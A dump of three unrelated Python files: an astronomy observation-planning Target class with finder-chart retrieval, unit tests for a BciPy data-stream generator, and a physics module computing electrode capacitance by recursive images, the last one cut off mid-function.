py | 1a4fc42ec0c4ee349378f129d9ab57347c44930c |
from ast import Continue
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy.wcs import WCS
from astropy.coordinates import SkyCoord
import pandas as pd
from photutils.aperture import SkyRectangularAperture, SkyCircularAperture
from .imaging import implot
from astroquery.skyview import SkyView
__all__ = ['Target']
class Target():
def __init__(self,name,parse_name=True,coordinates=None,coord_units=None):
'''
Initializes the Target object.
Parameters
----------
name: str
name to use for the target throughout the suite.
parse_name: bool, optional, default True
If the name is that of a known object resolvable by Simbad, parse it to determine coordinates.
coordinates: SkyCoord or str, optional, default None
If parse_name is False, supply coordinates for the target manually. Must be a SkyCoord object or string with coordinates. If string, coord_units must be supplied.
coord_units: tuple or str, optional, default None
if supplying coordinates as a string, the units as accepted by SkyCoord must be provided, e.g., (u.hourangle,u.deg) or 'deg'.
Returns
-------
None
Sets
----
configs: dict
a dictionary containing configuration information.
Notes
-----
It is not strictly necessary for the Target itself to have coordinates defined, but every configuration must.
'''
self.name = name
if parse_name:
self.coordinates = SkyCoord.from_name(name)
else:
if coordinates is not None:
if isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.coordinates = SkyCoord(coordinates,unit=coord_units)
elif isinstance(coordinates,SkyCoord):
self.coordinates = coordinates
self.configs = {}
def add_configuration(self,config_name,obstype=None,coordinates=None,coord_units=None,**kwargs):
'''
Add an observing configuration for this target, specifying as many fields as desired.
Parameters
----------
config_name: str
Name for this configuration. As names are eventually used in the exporting of targetlists, it is worth keeping the name short-ish, as many observatories have character limits on this column
obstype: str, optional, default None
For now, either 'imaging' or 'spectroscopy'. Some features later on depend on this.
coordinates: str or SkyCoord, optional, default None
If the coordinates of this configuration differ from the object coordinates or from other configurations, supply coordinates (either SkyCoord or string). If string, coord_units must be provided.
coord_units: tuple or str, optional, default None
If coordinates are provided as a string, a unit (e.g., (u.hourangle, u.deg) or 'deg') as accepted by SkyCoord is required.
**kwargs: optional
Any desired fields for this configuration one wants displayed later, e.g., slit pa, slit width, etc., can be added as keyword arguments with values, and will be stored.
Returns
-------
None
Sets
----
self.configs: dict
dictionary of all configuration specifications.
'''
if config_name in self.configs.keys():
cont = input(f'Config Name {config_name} already a configuration. Overwrite? [Enter yes, N for no]: ')
if cont.upper() == 'N':
return
self.configs[config_name] = {}
self.configs[config_name]['obstype']= obstype
if coordinates is not None:
if isinstance(coordinates,SkyCoord):
self.configs[config_name]['coordinates'] = coordinates
elif isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.configs[config_name]['coordinates'] = SkyCoord(coordinates,unit=coord_units)
elif self.coordinates is not None:
self.configs[config_name]['coordinates'] = self.coordinates
else:
self.configs[config_name]['coordinates'] = None
for i in kwargs.keys():
self.configs[config_name][i] = kwargs[i]
def remove_configuration(self,config_name):
'''
Remove a configuration from the list
Parameters
----------
config_name: str
the configuration name to remove
'''
try:
self.configs.pop(config_name)
except KeyError:
print('config not found')
return
def edit_configuration(self,config_name,quantity,value):
'''
Edit a configuration by changing the value in one of the columns.
Parameters
----------
config_name: str
the name of the configuration to edit
quantity: str
the name of the quantity (e.g., 'obstype', or a quantity added via keyword argument) to edit
value: Any
updated value. As a note, we recommend only using this for simple string/display values. Editing, e.g., coordinates this way does not run the code to make a new SkyCoord. To change the coordinates associated with a configuration, we suggest re-adding it (with the same name) but new coords to overwrite it.
'''
try:
self.configs[config_name][quantity] = value
except KeyError:
print('configuration name not found')
return
def add_offset_star(self,coordinate,coord_units=None,configurations='all'):
'''
Add an offset star to the configuration. Offset stars are used to execute blind offsets when a source is too faint to see in typical aquisition exposures.
If an offset star is provided, the offsets between the star and the configurations coordinates (in arcsec east and north) is automatically calculated and added to the configuration.
Parameters
----------
coordinate: str or SkyCoord
coordinates of the offset star. Either SkyCoord object or string. If string provided, must also provide coord_units for creation of SkyCoord object.
coord_units: tuple or str, optional, default None
if coordinates provided as a string, units acceptable by SkyCoord (e.g., (u.hourangle, u.deg) or 'deg') must be provided here.
configurations: str or list, optional, default 'all'
Which configurations to apply this offset star to. Default is 'all', one can pass individual configuration names as strings, or a list of configuration names (as strings).
Returns
-------
None
Sets
----
Sets the 'offset star' key for the chosen configuration(s) as the star coordinates and the 'offsets' key to the offsets, visible via view_configurations().
'''
if isinstance(coordinate,str):
if coord_units is not None:
coord = SkyCoord(coordinate,unit=coord_units)
else:
raise AssertionError('If string coordinate provided, units must be provided for SkyCoord creation')
elif isinstance(coordinate,SkyCoord):
coord = coordinate
if configurations=='all':
for i in self.configs.keys():
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
elif isinstance(configurations,str):
os = coord.spherical_offsets_to(self.configs[configurations]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[configurations]['offset star'] = coord
self.configs[configurations]['offsets'] = add_str
elif isinstance(configurations,list):
for i in configurations:
os = coord.spherical_offsets_to(self.configs[i]['coordinates'])
os = [os[0].to(u.arcsec).value,os[1].to(u.arcsec).value]
add_str = f'''{os[0]:.3f}'' E, {os[1]:.3f}'' N'''
self.configs[i]['offset star'] = coord
self.configs[i]['offsets'] = add_str
def set_survey(self,survey_name):
self.survey_name = survey_name
def retrieve_finder_chart(self,config_name,size,pixels=500,show_aperture=True,**implot_kwargs):
'''
Retrieve a DSS image (finder chart) around the target. If obsmode is spectroscopy, optionally show the location of the slit or circular fiber on the image.
Parameters
----------
config_name: str
name of the configuration to retrieve finder for
size: astropy Quantity
dimensions of the finder box to use. Box is square.
pixels: int, optional (default 500)
dimensions (in pixels) of the image to retrieve. (Larger downloads take longer).
show_aperture: bool, optional (default True)
flag for whether to show an apertuer (rectangular slits and circular apertures supported). If this flag turned on, the following must be true.
For slits, your configuration must have properties `slit_width`, `slit_length`, and `PA`.
For circular apertures, your configuration must have a property `fiber_radius`.
**implot_kwargs: optional
arguments passed to the utility function `implot` to display the image. These include scale (images are scaled about their mean pixel value), colorbar flag, etc.
Returns
-------
fig, ax: matplotlib figure and axes objects
the fig and ax on which the dss image and possible aperture was plotted.
'''
sv = SkyView()
if hasattr(self,'survey_name'):
survey=self.survey_name
else:
survey='SDSSdr7g'
paths = sv.get_images(position=self.configs[config_name]['coordinates'],
survey=[survey],
coordinates='J2000',
width=size,
height=size,
grid=True,
gridlabels=True,
pixels=str(pixels))
image = paths[0][0].data
wcs = WCS(paths[0][0].header)
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA']+90*u.deg)
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
raise KeyError('''show_slit set to true, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def add_custom_image(self,config_name,image_name,image,wcs=None):
'''
Add a custom image of your target. Allows for your image to be added to the observing plan along with, e.g., retrieved DSS imaging.
Parameters
----------
config_name: str or list
configuration for which this image should apply. Can be a single configuration string, a list of configuration strings, or 'all'.
image_name: str
a name for the image (for later plotting and access).
image: array_like
the array containing the image
wcs: astropy.WCS, optional (default None)
a wcs object defining the coordinates of the image. This must be provided for some functionality, like overplotting slits/apertures.
'''
self.configs[config_name]['user_images'] = {}
self.configs[config_name]['user_images'][image_name] = {}
self.configs[config_name]['user_images'][image_name]['image'] = image
self.configs[config_name]['user_images'][image_name]['wcs'] = wcs
def show_custom_image(self,config_name,image_name,show_aperture=True,**implot_kwargs):
'''
Display the custom image provided by user. If possible, show aperture (slit/fiber) over it.
'''
image = self.configs[config_name]['user_images'][image_name]['image']
wcs = self.configs[config_name]['user_images'][image_name]['wcs']
fig, ax = implot(image,wcs=wcs,cmap='gray',**implot_kwargs)
if show_aperture:
if self.configs[config_name].keys() >= {'slit_width','slit_length','PA'}:
slit = SkyRectangularAperture(self.configs[config_name]['coordinates'],
w=self.configs[config_name]['slit_width'],
h=self.configs[config_name]['slit_length'],
theta=self.configs[config_name]['PA'])
slit.to_pixel(wcs).plot(color='r',lw=3)
elif self.configs[config_name].keys() >= {'fiber_radius'}:
fiber = SkyCircularAperture(self.configs[config_name]['coordinates'],
r=self.configs[config_name]['fiber_radius'])
fiber.to_pixel(wcs).plot(color='r',lw=3)
else:
raise KeyError('''show_slit set to true, but this configuration does not have 'slit_width','slit_length', and 'PA' set, which are needed for slit display, or 'fiber_radius' set, for circular aperture.''')
return fig, ax
def list_configurations(self):
df = pd.DataFrame.from_dict(self.configs,orient='index')
df['coordinates'] = [i.to_string() for i in df['coordinates'] if isinstance(i,SkyCoord)]
if 'offset star' in df.columns:
df['offset star'] = [i.to_string() if isinstance(i,SkyCoord) else np.nan for i in df['offset star']]
if 'user_images' in df.columns:
df['user_images'] = ['Y' if isinstance(i,dict) else np.nan for i in df['user_images']]
df.index.name = 'configurations'
df = df.replace({np.nan: '---'})
return df
def nudge_configuration(self,config_name,arcsec_east,arcsec_north):
'''
Nudge the coordinates of a configuration east or north in arcsec
for better alignment.
Parameters
----------
config_name: str
name of configuration to nudge
arcsec_east: float
amount to nudge east (west is negative) in arcsec
arcsec_north: float
amount to nudge north (south is negative) in arcsec
'''
new_coordinate = self.configs[config_name]['coordinates'].directional_offset_by(0,arcsec_north*u.arcsec)
new_coordinate = new_coordinate.directional_offset_by(90,arcsec_east*u.arcsec)
self.configs[config_name]['coordinates'] = new_coordinate
@property
def configurations(self):
return self.list_configurations() |
py | 1a4fc4e3003a83aba98096c11cffb5bbcac701ee | # pylint: disable=too-few-public-methods,no-self-use
"""Tests for datastream generator module"""
from builtins import next
import unittest
import pytest
from past.builtins import map, range
from mock import mock_open, patch
from bcipy.acquisition.datastream.generator import random_data, file_data
from bcipy.acquisition.util import mock_data
class CustomEncoder():
"""Encodes data by prefixing with the count."""
def __init__(self):
super(CustomEncoder, self).__init__()
self.counter = 0
def encode(self, data):
"""Encode the data."""
self.counter += 1
return (self.counter, data)
class TestGenerator(unittest.TestCase):
"""Tests for Generator"""
def test_random_generator(self):
"""Test default parameters for random generator"""
gen = random_data()
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
def test_random_high_low_values(self):
"""Random generator should allow user to set value ranges."""
channel_count = 10
low = -100
high = 100
gen = random_data(low=-100, high=100,
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for record in data:
self.assertEqual(len(record), channel_count)
for value in record:
self.assertTrue(low <= value <= high)
def test_random_with_custom_encoder(self):
"""Random generator should allow a custom encoder."""
channel_count = 10
gen = random_data(encoder=CustomEncoder(),
channel_count=channel_count)
data = [next(gen) for _ in range(100)]
self.assertEqual(len(data), 100)
for _count, record in data:
self.assertEqual(len(record), channel_count)
self.assertEqual(data[0][0], 1)
self.assertEqual(data[99][0], 100)
def test_file_generator(self):
"""Should stream data from a file."""
row_count = 100
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
generated_data = [next(gen) for _ in range(row_count)]
for i, row in enumerate(generated_data):
self.assertEqual(row, data[i])
def test_file_generator_end(self):
"""Should throw an exception when all data has been consumed"""
row_count = 10
header = ['col1,col2,col3']
data = list(mock_data(row_count, len(header)))
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(filename='foo', header_row=1)
# exhaust the generator
for _ in range(row_count):
next(gen)
with pytest.raises(StopIteration):
data.append(next(gen))
def test_file_with_custom_encoder(self):
"""Should allow a custom encoder"""
col_count = 3
row_count = 100
header = ['col1,col2,col3']
data = [[float(cnum + rnum) for cnum in range(col_count)]
for rnum in range(row_count)]
rows = map(lambda x: ','.join(map(str, x)), data)
test_data = '\n'.join(header + rows)
with patch('bcipy.acquisition.datastream.generator.open',
mock_open(read_data=test_data), create=True):
gen = file_data(
filename='foo', header_row=1, encoder=CustomEncoder())
generated_data = [next(gen) for _ in range(row_count)]
for _count, record in generated_data:
self.assertEqual(len(record), col_count)
self.assertEqual(generated_data[0][0], 1)
self.assertEqual(generated_data[99][0], 100)
|
py | 1a4fc5763cea3c91aa138934d88a908f3f68721c | """
pair_conformal.py
====================================
Module for calculating :math:`C_2` using linear algebra,
based on components generated by the method of recursive images
using conformal mapping to obtain :math:`V_{2\infty}`
"""
import scipy
import scipy.special
import numpy as np
import numpy.linalg
from infinite_conformal import fF
eps0= 8.854187817*10**-12
############### old code
'''
def fF(phi,k,accuracy_limit):
"""
Calculates the inverses of the incomplete elliptic integral of the first kind
for a complex argument phi. This function uses Jacobis form (phi) rather than the trigonometric form.
uses scipy.integrate.quad for intergration
scipy.special.ellipkinc(phi, k*k) could have been used if phi was a real number
Parameters
----------
phi : complex number
k : real number
accuracy_limit : limit for accuracy in quad
Returns
-------
complex number
value of incomplete integral
"""
outreal=scipy.integrate.quad(lambda x: fFargRe(k,phi,x), 0, 1,eps_r_of_layersel=accuracy_limit)
outimag=scipy.integrate.quad(lambda x: fFargIm(k,phi,x), 0, 1,eps_r_of_layersel=accuracy_limit)
return (outreal[0]+1j*outimag[0])*phi
def fFargRe(k,phi, x):
"""Real part of the argument for the integral in fF()
"""
theta=phi*x
return (1/np.sqrt(1-k*k*np.sin(theta)**2)).real
def fFargIm(k,phi, x):
"""Imaginary part of the argument for the integral in fF()
"""
theta=phi*x
return (1/np.sqrt(1-k*k*np.sin(theta)**2)).imag'''
def fdtDdz(a):
"""Function for calculating :math:`\\frac{dt}{dz}` in order to calculate the electric field in x and y direction.
Note that this function is disticnt from the one in infinite_conformal.py
"""
return 2/a
def fdwDdt(k,t):
"""Function for calculating :math:`\\frac{dw}{dz}` in order to calculate the electric field in x and y direction.
"""
out = 1/np.sqrt( (1-t**2)*(1-t**2*k**2) )
# because of the sqrt, there are two possible solutions, need to make sure we select the rigth one
if out.imag>0:
return out
return -out
def fdwDdz(k,t,a):
"""Function for calculating :math:`\\frac{dt}{dz}` in order to calculate the electric field in x and y direction.
"""
return fdwDdt(k,t)*fdtDdz(a)
class single_recursive_images:
"""
A class that houses the potential, capacitance and electric fields from the method of recursive images.
The values obtained are unphysical, as the potential at the electrodes is not constant.
Parameters
----------
eta : float
cover fraction of the electrodes
interface_of_electrodes : int
interface for the electrodes
thickness_of_layers : list of floats
thicknesses of the layers, this list will be 2 shorter than eps_x_of_layers and eps_y_of_layers, as the outermost layers have no defined thickness, but are infinite
eps_x_of_layers : list of floats
in-plane dielectric constant of the layers
eps_y_of_layers : list of floats
out-of-plane dielectric constant of the layers
max_reflections : int, optional
maximum number of reflections to considder, defaults to 8
accuracy_limit : float, optional
reflections with less than accuracy_limit are ignored, defaults to 10**-15
"""
_V_dicts=dict()#_V_dicts[k][y][x]=V_{I,inf}(x,y)
def __init__(self,a,b,interface_of_electrodes,thickness_of_layers,eps_x_of_layers,eps_y_of_layers,max_reflections=8,accuracy_limit=10**-7):
self.b=b
self.a=a
self.eta=b/(a+b)
self.interface_of_electrodes=interface_of_electrodes
self.thickness_of_layers=thickness_of_layers
# calculate the y-coordinate of each interface
self.y_of_interfaces=[0]
for T in thickness_of_layers:
self.y_of_interfaces.append(self.y_of_interfaces[-1]+T)
self.eps_x_of_layers=eps_x_of_layers
self.eps_y_of_layers=eps_y_of_layers
self.number_of_layers=len(self.eps_y_of_layers)
# calculate the reflection coefficients for each interface
self.r_pos_dir=[] # reflection coefficients for potential going in positive direction
self.r_neg_dir=[] # reflection coefficients for potential going in negative direction
self.t_pos_dir=[] # transmission coefficients for potential going in positive direction
self.t_neg_dir=[] # transmission coefficients for potential going in negative direction
for i in range(self.number_of_layers-1):
eps1=np.sqrt(self.eps_y_of_layers[i]*self.eps_x_of_layers[i])
eps2=np.sqrt(self.eps_y_of_layers[i+1]*self.eps_x_of_layers[i+1])
self.r_pos_dir.append((eps1-eps2)/(eps1+eps2))
self.t_pos_dir.append(self.r_pos_dir[-1]+1)
self.r_neg_dir.append(-self.r_pos_dir[-1])
self.t_neg_dir.append(self.r_neg_dir[-1]+1)
# calculate eps_r of all layers
self.eps_r_of_layers=[]
for i in range(self.number_of_layers):
if self.eps_y_of_layers[i]>0:
self.eps_r_of_layers.append((self.eps_x_of_layers[i]/self.eps_y_of_layers[i])**0.5)
else:
self.eps_r_of_layers.append(1)
# calculate k for the electrodes
# k is the argument for the eliptical integrals
self.max_reflections=max_reflections
self.accuracy_limit=accuracy_limit
self.k=(1-self.eta)/(1+self.eta) #external
self.Kk= scipy.special.ellipk(float(self.k**2))
self.Kpk= scipy.special.ellipk(1-float(self.k**2))
if not self.k in self._V_dicts:
self._V_dicts[self.k]=dict()
self.Vdict=self._V_dicts[self.k] #Vdict[y][x]=V_{I,inf}(x,y)
self.tree=[]
def get_tree(self):
if len(self.tree)==0:
self.make_tree()
return self.tree
def make_tree(self):
"""
Function for building the tree\n
The tree consists of a list of lists where
the main list iterates over the layers and
the sublists contain a series of cases defined as:\n
[dist prior, direction, amplitude]\n
dist prior: the distance traveled to get to the current layer\n
direction: the direction of the potential throught the layer (reflection switches the direction)\n
amplitude: multiplication of all the reflection and transmission coefficients so far\n
The cases are calculated iteratively, staring with the initial projected fields
(with positive direction in the layer above the electrodes, and negative direction below them)\n
"""
''' tree will contain the full tree, and the reflections are added iteratively
temp_tree_1 and temp_tree_2 are used to keep track of what fields will be
adressed in the next iteration'''
tree=[]
temp_tree_2=[]
for layer in range(self.number_of_layers):
tree.append([])
temp_tree_2.append([])
#[dist prior,direction,amplitude,displacementx]
''' add initial fields'''
temp_tree_2[self.interface_of_electrodes].append([0,-1,1])
tree[self.interface_of_electrodes].append([0,-1,1])
temp_tree_2[self.interface_of_electrodes+1].append([0,1,1])
tree[self.interface_of_electrodes+1].append([0,1,1])
for step in range(self.max_reflections):
temp_tree_1=temp_tree_2
temp_tree_2=[]
for layer in range(self.number_of_layers):
temp_tree_2.append([])
''' at this point
temp_tree_1 contains the fields that should generate additional reflections
temp_tree_2 is empty, and cases for the next iteration are added here'''
for layer in range(self.number_of_layers-2): #layer-2 because the outermost layers have infinite thickness and cannot generate reflections
for case in temp_tree_1[layer+1]:
dist_prior=case[0]
dist_add=self.thickness_of_layers[layer]*self.eps_r_of_layers[layer+1]
direction=case[1]
amplitude=case[2]
if abs(amplitude*np.exp(-np.pi*(dist_prior+dist_add)))>self.accuracy_limit:
if direction==1:
temp_tree_2[layer+1].append([dist_prior+dist_add,-direction,amplitude*self.r_pos_dir[layer+1]])
temp_tree_2[layer+2].append([dist_prior+dist_add,direction,amplitude*self.t_pos_dir[layer+1]])
tree[layer+1].append(temp_tree_2[layer+1][-1]) # add to actual tree
tree[layer+2].append(temp_tree_2[layer+2][-1]) # add to actual tree
if direction==-1:
temp_tree_2[layer+1].append([dist_prior+dist_add,-direction,amplitude*self.r_neg_dir[layer]])
temp_tree_2[layer].append([dist_prior+dist_add,direction,amplitude*self.t_neg_dir[layer]])
tree[layer+1].append(temp_tree_2[layer+1][-1]) # add to actual tree
tree[layer].append(temp_tree_2[layer][-1]) # add to actual tree
self.tree=tree
def get_C(self):
"""
Returns
-------
float
capacitace
"""
eps_m_below=self.eps_y_of_layers[self.interface_of_electrodes]*self.eps_r_of_layers[self.interface_of_electrodes]
eps_m_above=self.eps_y_of_layers[self.interface_of_electrodes+1]*self.eps_r_of_layers[self.interface_of_electrodes+1]
return (eps_m_below+eps_m_above)*self.Kpk/self.Kk*eps0/2
def get_C_int_Ex(self):
"""
Function for calculating the capacitance by integrating :math:`\\varepsilon_xE_x` at :math:`x=0`.\n
Used for testing, as it should give same output as get_C().\n
For all practical applications get_C() should be used instead\n
Returns
-------
float
capacitace
"""
if self.eps_x_of_layers[0]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), -80, 0)
C = G*self.eps_x_of_layers[0]*eps0
else:
C = 0
for i in range(self.number_of_layers-2):
if self.eps_x_of_layers[i+1]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), self.y_of_interfaces[i], self.y_of_interfaces[i+1])
C+= G*self.eps_x_of_layers[i+1]*eps0
if self.eps_x_of_layers[-1]>0:
G,error=scipy.integrate.quad(lambda y: self.get_Ex(0,y), self.y_of_interfaces[-1], 80)
C+= G*self.eps_x_of_layers[-1]*eps0
return -C
def get_V_Ex_Ey(self,x,y,get_V=1,get_Ex=1,get_Ey=1): # accepts 'x' as a list, but 'y' must be single value
"""
Function for calculating the the potential and electric fields at coordinates (x,y)
Parameters
----------
x : float or list of floats
x-coordiate(s)
y : float
y-coordiate
get_V : bool, optional
V is only calculated if this flag is set to True, default: True
get_Ex : bool, optional
Ex is only calculated if this flag is set to True, default: True
get_Ey : bool, optional
Ey is only calculated if this flag is set to True, default: True
Returns
-------
list of float for V, Ex, Ey
"""
tree=self.get_tree()
#print('donetree',time.time()-t0)
x=np.array(x)
x=np.atleast_1d(x)
V=np.zeros(x.size)
Ex=np.zeros(x.size)
Ey=np.zeros(x.size)
layer=0
while layer<len(self.y_of_interfaces) and self.y_of_interfaces[layer]<=y:
layer+=1
if self.eps_y_of_layers[layer]==0:
return 0,0,0
#nn=[]
for case in tree[layer]:
#dist_prior=#[dist prior,direction]
dist_prior=case[0]
direction=case[1]
amplitude=case[2]
if amplitude==0: continue
if direction==1:
#interfaces[layer] is the interface below the layer
Y=dist_prior+self.eps_r_of_layers[layer]*(y-self.y_of_interfaces[layer-1])
else: #direction==-1
Y=dist_prior-self.eps_r_of_layers[layer]*(y-self.y_of_interfaces[layer])
for i,XX in enumerate(x):
if get_Ex or get_Ey:
z=abs(XX)+1j*Y # posistion on the z-plane
t=z*2/self.a # posistion on the t-plane
dwDdz=fdwDdz(self.k,t,self.a) # :math:`\\frac{dw}{dz}`
if get_Ex:
Ex[i]+=1/self.Kk*dwDdz.real*amplitude
if get_Ey:
Ey[i]+=1/self.Kk*dwDdz.imag*direction*amplitude*self.eps_r_of_layers[layer]
if get_V:
Yp=abs(Y)
if not Yp in self.Vdict:
self.Vdict[Yp]={}
if not XX in self.Vdict[Yp]:
z=XX+1j*Yp# posistion on the z-plane
t=z*2/self.a # posistion on the t-plane
F=fF(np.arcsin(t),self.k,self.accuracy_limit/amplitude) # heavy lifting for transformation to w-plane
self.Vdict[Yp][XX]=((1/self.Kk)*F.real)
V[i]+=self.Vdict[Yp][XX]*amplitude
####################################
return V/2, Ex/2, Ey/2
def get_V(self,x,y):
"""
calls get_V_Ex_Ey() to calculate V
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,1,0,0)
return V
def get_Ex(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ex
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,1,0)
return Ex
def get_Ey(self,x,y):
"""
calls get_V_Ex_Ey() to calculate Ey
"""
V,Ex,Ey=self.get_V_Ex_Ey(x,y,0,0,1)
return Ey
class multiple_recursive_images:
"""
A class generates and houses instances of the class single_recursive_images and uses a linear combination of these
to approximate physcal values for the capacitance, potential, and electric fields of an electrode pair.
Parameters
----------
etas : list of float
cover fraction of the electrode(s) must be a list of the same length as there are interfaces, i.e. 1 shorter than eps_x_of_layers
each value must be 0=<eta=<1. 0 indicates that no electrode exists at the corresponding interface
thickness_of_layers : list of floats
thicknesses of the layers, this list will be 2 shorter than eps_x_of_layers and eps_y_of_layers, as the outermost layers have no defined thickness, but are infinite
eps_x_of_layers : list of floats
in-plane dielectric constant of the layers
eps_y_of_layers : list of floats
out-of-plane dielectric constant of the layers
LAcomp: int or list of ints, optional
the number of components used for each set of electrodes. If list, the list must be the same length as etas, and have a number larger than one for each nonzero value in etas.
If not list the same value vill be used for all electrodes. Defaults to 8
max_reflections : int, optional
maximum number of reflections to considder, defaults to 8
voltages : list of floats or None, optional
If a list of floats is provided, the voltage at each set of electrodes will be set to +/- the corresponding value in the list. the list must have the same length as etas.
If None, the potential at each set of electrodes with a cover fraction less than 1 is set to +/-0.5, for a total difference of 1V. The potential at electrodes with a cover fraction of 1 is set to 0, as this is assumed to be grounded.
Defaults to None. NB! the calcualted capacitance assumed a potential of +/-0.5 at the electrodes, and if a different value is used, calculated capacitance will reflect the charge at the electrodes rather than the capacitance!
periods : list of floats or none, optional
list of the same length as there are interfaces that declares the period for electrodes on that interface.
If None, all electrodes have a period of one. Electrodes extend from period*(1-eta)/2 to period*(1+eta/2) in this class.
Typical use is when approximating an infinite grounded electrode. The infinite electrode is then set to have a period > 1.
Defaults to None
accuracy_limit : float, optional
reflections with amplitude less than accuracy_limit are ignored, defaults to 10**-15
"""
def __init__(self,etas,thickness_of_layers,eps_x_of_layers,eps_y_of_layers,LAcomp=8,max_reflections=8, voltages = None,periods=None,accuracy_limit=10**-10):
# eta = vector of floats, t = vector of floats, eps_x_of_layers = vector of floats, eps_y_of_layers = vector of floats, LAcomp = int, max_reflections = int,
# eps_x_of_layers and eps_y_of_layers refer to materials, the length must therefore be at least 2
# eta refers to interfaces, the length must therefore be at least 1
# t refers to the thicknes of layers of finite thickness. This vector may have 0 elements.
# LAcomp must be an int, or a vector of same length as eta
# voltages must be 'None' or a vector of same length as eta, and is uset to set voltage ratios if multiple sets of electrodes are used
self.accuracy_limit=accuracy_limit
self.etas=etas
if periods==None:
self.periods=np.ones(len(self.etas))
else:
self.periods=periods
self.thickness_of_layers=thickness_of_layers
self.eps_x_of_layers=eps_x_of_layers
self.eps_y_of_layers=eps_y_of_layers
self.LAcomp=LAcomp
self.max_reflections=max_reflections
self.voltages=voltages
if self.voltages == None: # create voltages vector, all electrode sets should have V=0.5, unless they are continious, then they should have 0. If no electrodes are present at the interface, then the voltage is also set to 0
self.voltages = []
for eta in self.etas:
if eta == 0:
self.voltages.append(0)
elif eta == 1:
self.voltages.append(0)
else:
self.voltages.append(0.5)
# declare the step size for for eta in each set of electrodes
self.electrodesteps=[]
if isinstance(LAcomp, (int,)):
for eta in self.etas:
self.electrodesteps.append(eta/self.LAcomp)
else:
for eta, LA in zip(self.etas, self.LAcomp):
if LA>0:
self.electrodesteps.append(eta/LA)
else:
self.electrodesteps.append(0)
# calculate the relevant locations, as and bs for the linear algebra aproach
# for each case, the a and b is changed so that the outermost part of the electrode remains in place
self.xpoints=[] #<- list of list of points of interest
self.xpointVs=[]
self.caseAs=[] #<- list of lists of a of individual cases
self.caseBs=[] #<- list of lists of b of individual cases
for eta, step, V,period in zip(self.etas, self.electrodesteps,self.voltages,self.periods):
self.xpoints.append([])
self.caseAs.append([])
self.caseBs.append([])
l=step*0.5
while l<eta and l<1-step: # the second condition prevents the last from beeing added if the electrodes are continious.
self.xpoints[-1].append((-l+0.5+eta/2)*period)
self.caseBs[-1].append((l+step*0.5)*period)
self.caseAs[-1].append((1+eta-2*l-step)*period)
self.xpointVs.append(V)
l+=step
self.C=-1
def get_C(self):
"""
Function for calculate the total capacitance using linear algebra.
To do this it needs to first build the different single_recursive_images objects
Then use them to calculate the potential at self.xpoints, and use linear algebra to find the weights.
Finally, the capacitance is calculated by sum(weights*single_recursive_images.get_C)
Returns
-------
float
capacitace
"""
if self.C==-1:
self.Cs=[]
self.single=[]
self.Vs=[]
# electrodes may exist on multiple interfaces, so iterate
for interface, _ in enumerate(self.caseAs):
for a,b in zip(self.caseAs[interface],self.caseBs[interface]):
self.single.append(single_recursive_images(a,b,interface,self.thickness_of_layers,self.eps_x_of_layers,self.eps_y_of_layers,self.max_reflections,self.accuracy_limit))
self.Vs.append(np.array([]))
# calculate the potential for the last case at all designated locations
# iterate over designated locations: first iterate over layers
y=0 # need y to keep track of location as we iterate over layers
for interfaceOfXpoint, _ in enumerate(self.caseAs):
if len(self.xpoints[interfaceOfXpoint])>0: # only calculate if there are any points
# utilize the fact that get_V suppoprts a list of x coordinates as unput to
# calculate all points on this interface by one function call
V=self.single[-1].get_V(self.xpoints[interfaceOfXpoint],y)
# concatenate the potentials at this interface with previous potensials at other interfaces
self.Vs[-1]=np.concatenate((self.Vs[-1], V))
if interfaceOfXpoint<len(self.thickness_of_layers):
# need y to keep track of location as we iterate over layers
y+=self.thickness_of_layers[interfaceOfXpoint]
# get the corresponding capacitance associtaed with these potentials
self.Cs.append(self.single[-1].get_C())
# solve the linear algebra expression for X: AX=B
A=np.array(self.Vs).transpose()
B=np.array(self.xpointVs)
self.weights=numpy.linalg.solve(A,B)
# calculate the capacitance
self.C=np.dot(np.array(self.Cs),np.array(self.weights))
return self.C
def get_C_int_Ex(self):
"""
Function for calculating the capacitance by integrating :math:`\\varepsilon_xE_x` at :math:`x=0`.\n
Used for testing, as it should give same output as get_C().\n
For all practical applications get_C() should be used instead\n
Returns
-------
float
capacitace
"""
if self.C==-1:
self.get_C()
Cs=[]
for case in self.single:
Cs.append(case.get_C_int_Ex())
